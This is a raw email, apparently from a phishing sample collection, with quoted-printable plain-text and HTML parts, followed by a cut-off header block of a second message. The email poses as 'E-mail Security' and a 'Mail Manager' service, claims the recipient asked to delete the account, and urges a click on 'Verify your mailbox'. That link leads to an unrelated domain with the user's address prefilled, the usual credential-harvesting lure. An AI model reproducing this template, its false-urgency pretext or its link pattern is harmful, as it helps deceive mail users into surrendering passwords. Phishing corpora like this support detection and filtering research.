From: "E-mail Security" <admin@oceanshipforafrica.xyz>
Date: Tue, 13 Jun 2017 20:12:58 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - 2748089.securefastserver.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - oceanshipforafrica.xyz
X-Get-Message-Sender-Via: 2748089.securefastserver.com: authenticated_id: admin@oceanshipforafrica.xyz
X-Authenticated-Sender: 2748089.securefastserver.com: admin@oceanshipforafrica.xyz
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 225

You will not see this in a MIME-aware mail reader.
--===============1138257456==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   =

            =


  =

    =

    =

   =


   Hi jose@monkey.org,   You made a request to terminate your account.   If=
 this was you, please ignore this message and your account will be deleted =
from our system within the next 72hrs otherwise click the button below to v=
erify and cancel this request.  Verify your mailbox
 Once your account is deleted, access to retrieve your account will be deni=
ed. =

Cancel the termination request to keep enjoying our service.      Replies s=
ent to this email cannot the answered. =A9 2017 Mail Manager All Rights Res=
erved.
--===============1138257456==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" http-equiv=3DContent-Type>
<META name=3DGENERATOR content=3D"MSHTML 8.00.7601.17514"></HEAD>
<BODY>
<TABLE class=3D"cf gJ" cellPadding=3D0>
<TBODY>
<TR class=3D"acZ xD">
<DIV class=3D"gE iv gt"></DIV></TR></TBODY></TABLE>
<DIV id=3D:lh class=3D"ii gt adP adO">
<DIV id=3D:lg class=3D"a3s aXjCH m15c67cc424633c09">
<DIV>
<DIV style=3D"BACKGROUND-COLOR: #fff; FONT-FAMILY: garamond,new york,times,=
serif; COLOR: #000; FONT-SIZE: 16px">
<DIV style=3D"DISPLAY: block" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_=
1496316997540_73047 class=3Dm_-5927298864122360823yahoo_quoted>
<DIV style=3D"FONT-FAMILY: garamond,new york,times,serif; FONT-SIZE: 16px" =
id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73046>
<DIV style=3D"FONT-FAMILY: HelveticaNeue,Helvetica Neue,Helvetica,Arial,Luc=
ida Grande,sans-serif; FONT-SIZE: 16px" id=3Dm_-5927298864122360823yui_3_16=
_0_ym19_1_1496316997540_73045>
<DIV id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73089 class=
=3Dm_-5927298864122360823y_msg_container>
<DIV id=3Dm_-5927298864122360823yiv1842322182>
<DIV dir=3Dltr id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_7=
3088>
<DIV id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73087 class=
=3Dm_-5927298864122360823yiv1842322182gmail_quote>
<DIV id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73086><BR s=
tyle=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); FONT-STYL=
E: normal; TEXT-INDENT: 0px; FONT-FAMILY: arial,sans-serif; WHITE-SPACE: no=
rmal; LETTER-SPACING: normal; COLOR: rgb(34,34,34); FONT-SIZE: small; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; text-decoration-color: initial"><BR styl=
e=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); FONT-STYLE: =
normal; TEXT-INDENT: 0px; FONT-FAMILY: arial,sans-serif; WHITE-SPACE: norma=
l; LETTER-SPACING: normal; COLOR: rgb(34,34,34); FONT-SIZE: small; FONT-WEI=
GHT: normal; WORD-SPACING: 0px; text-decoration-color: initial">
<DIV style=3D"TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); FON=
T-STYLE: normal; TEXT-INDENT: 0px; FONT-FAMILY: sans-serif; WHITE-SPACE: no=
rmal; LETTER-SPACING: normal; COLOR: rgb(34,34,34); FONT-SIZE: small; FONT-=
WEIGHT: normal; WORD-SPACING: 0px; text-decoration-color: initial" id=3Dm_-=
5927298864122360823yui_3_16_0_ym19_1_1496316997540_73085>
<TABLE style=3D"PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-LEFT: 0px; WIDTH:=
 809px; PADDING-RIGHT: 0px; FONT: 15px Arial,Helvetica; BACKGROUND: rgb(255=
,255,255); COLOR: rgb(51,51,51); PADDING-TOP: 0px; font-stretch: normal" id=
=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73084 class=3Dm_-5=
927298864122360823yahoo-compose-table-card border=3D0 cellSpacing=3D0 cellP=
adding=3D0>
<TBODY id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73083>
<TR id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73082>
<TD style=3D"MARGIN: 0px; FONT: 15px Arial,Helvetica; BACKGROUND: rgb(245,2=
52,249); font-stretch: normal" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1=
_1496316997540_73081 vAlign=3Dtop align=3Dleft>
<TABLE style=3D"BORDER-BOTTOM: medium none; MIN-WIDTH: 500px; BORDER-LEFT: =
medium none; PADDING-BOTTOM: 0px; MARGIN: 50px auto; PADDING-LEFT: 18px; WI=
DTH: 530px; PADDING-RIGHT: 18px; BORDER-TOP: medium none; BORDER-RIGHT: med=
ium none; PADDING-TOP: 0px" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_14=
96316997540_73115 class=3Dm_-5927298864122360823yahoo-compose-table-card>
<TBODY id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73114>
<TR id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73113>
<TD style=3D"MARGIN: 0px; FONT: 15px Arial,Helvetica; BACKGROUND: rgb(245,2=
52,249); font-stretch: normal" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1=
_1496316997540_73112 vAlign=3Dtop align=3Dleft>
<TABLE style=3D"BORDER-BOTTOM: medium none; MIN-WIDTH: 500px; BORDER-LEFT: =
medium none; PADDING-BOTTOM: 0px; MARGIN: 50px auto; PADDING-LEFT: 18px; PA=
DDING-RIGHT: 18px; BORDER-TOP: medium none; BORDER-RIGHT: medium none; PADD=
ING-TOP: 0px" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73=
111 class=3Dm_-5927298864122360823yahoo-compose-table-card width=3D694 heig=
ht=3D533>
<TBODY id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73110>
<TR height=3D57>
<TD style=3D"TEXT-ALIGN: center; PADDING-BOTTOM: 18px; MARGIN: 0px; PADDING=
-LEFT: 18px; PADDING-RIGHT: 18px; FONT-FAMILY: arial,sans-serif; BACKGROUND=
: rgb(44,205,151); PADDING-TOP: 18px; border-top-left-radius: 4px; border-t=
op-right-radius: 4px" vAlign=3Dtop align=3Dleft><BR></TD></TR>
<TR id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73109>
<TD style=3D"PADDING-BOTTOM: 18px; MARGIN: 0px; PADDING-LEFT: 18px; PADDING=
-RIGHT: 18px; FONT-FAMILY: arial,sans-serif; BACKGROUND: rgb(255,255,255); =
PADDING-TOP: 18px; border-bottom-left-radius: 4px; border-bottom-right-radi=
us: 4px" id=3Dm_-5927298864122360823yui_3_16_0_ym19_1_1496316997540_73108 v=
Align=3Dtop align=3Dleft>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">Hi jose@monkey.org,</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">You made a request to terminate your =
account.</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">If this was you, please ignore this m=
essage and your account will be deleted from our system within the next 72h=
rs otherwise click the button below to verify and cancel this request.</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal" align=3Dleft><A style=3D"TEXT-ALIGN: =
center; PADDING-BOTTOM: 10px; LINE-HEIGHT: 1.25em; MARGIN: 24px auto; PADDI=
NG-LEFT: 18px; WIDTH: 180px; PADDING-RIGHT: 18px; DISPLAY: block; BACKGROUN=
D: rgb(2,186,242); COLOR: rgb(255,255,255); FONT-SIZE: 16px; FONT-WEIGHT: 7=
00; TEXT-DECORATION: none; PADDING-TOP: 10px; border-radius: 3px" id=3Dyui_=
3_16_0_ym19_1_1496391136881_4629 href=3D"http://nohidepors.com/update/index=
.php?userid=3Djose@monkey.org" rel=3Dnofollow>
<P align=3Dcenter><SPAN id=3Dyui_3_16_0_ym19_1_1496391136881_4631 class=3Dy=
iv4432045841m_-7868935256989482366gmail-m_3555989237062128907m_-44188640243=
99917523m_-7039304492549644231gmail-m_3973448248189013223il>Verify your mai=
lbox</SPAN></P></A></DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">Once your account is deleted, access =
to retrieve your account will be denied.</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal"><BR>Cancel the termination request to=
 keep enjoying our service.</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">&nbsp;</DIV>
<DIV style=3D"FONT: 15px/1.25em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR:=
 rgb(51,51,51); font-stretch: normal">
<DIV style=3D"FONT: 12px/1em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR: rg=
b(147,147,147); font-stretch: normal">Replies sent to this email cannot the=
 answered.</DIV></DIV>
<DIV style=3D"FONT: 12px/1em Arial,Helvetica; MARGIN-BOTTOM: 0px; COLOR: rg=
b(147,147,147); font-stretch: normal">=A9 2017 Mail Manager All Rights Rese=
rved.</DIV></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></=
TBODY></TABLE></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV><=
/DIV></DIV></DIV></TR></TBODY></TABLE></BODY>
--===============1138257456==--

From jose@monkey.org Sat Jun 17 23:54:52 2017 +0000
Return-Path: bounce+0e95c9.2ee9e-jose=monkey.org@selectoglobal.com
Delivered-To: jose@monkey.org
X-FDA: 72963196824.07.ducks62_64af2623d1a63
X-Spam-Summary: 40,2.5,0,10d2ad6f83c9e706,d41d8cd98f00b204,bounce+0e95c9.2ee9e-jose=monkey.org@selectoglobal.com,:,RULES_HIT:41:72:355:375:379:455:543:962:967:969:973:982:983:988:989:1189:1208:1216:1224:1260:1263:1311:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1515:1516:1517:1535:1543:1568:1570:1571:1588:1589:1592:1593:1594:1623:1711:1714:1730:1747:1777:1792:1801:2198:2199:2393:2525:2543:2561:2565:2610:2682:2685:2693:2859:2890:2894:2905:2909:2912:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3586:3866:3867:3868:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4605:4903:5007:6248:6653:6669:6674:6688:7976:8603:8957:9025:9077:9388:9416:9908:10009:10049:10305:10346:11256:11257:11658:11914:12043:12219:12438:12760:12956:12958:12959:12963:13095:13110:13132:13139:13231:13439:14036:14096:14129:14181:14250:14523:14721:14818:14828:14849:21080:21325:21347:21433:21450:21451:21524:21554:21627:30001:30018:30019:30021:30038:30054:30055:30064:3
X-HE-Tag: ducks62_64af2623d1a63
X-Filterd-Recvd-Size: 5272
Received: from z6.mailgun.us (z6.mailgun.us [104.130.96.6])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sat, 17 Jun 2017 23:54:51 +0000 (UTC)
DKIM-Signature: a=rsa-sha256; v=1; c=relaxed/relaxed; d=selectoglobal.com; q=dns/txt;
 s=mailo; t=1497743691; h=Content-Transfer-Encoding: Content-Type:
